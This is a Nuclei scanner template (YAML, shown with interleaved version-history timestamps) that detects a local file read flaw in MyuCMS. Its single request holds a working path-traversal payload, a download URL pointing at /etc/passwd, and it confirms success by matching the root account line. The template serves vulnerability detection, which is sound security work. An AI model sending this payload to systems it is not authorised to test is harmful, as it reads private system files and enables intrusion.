nuclei-templates/vulnerabilities/other/myucms-lfr.yaml

17 lines
384 B
YAML
Raw Normal View History

2021-04-09 21:40:57 +00:00
id: myucms-lfr
info:
name: MyuCMS Local File Read
author: princechaddha
severity: high
tags: myucms,lfi
2021-05-10 06:52:26 +00:00
reference: https://blog.csdn.net/yalecaltech/article/details/104908257
2021-04-09 21:40:57 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1"
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"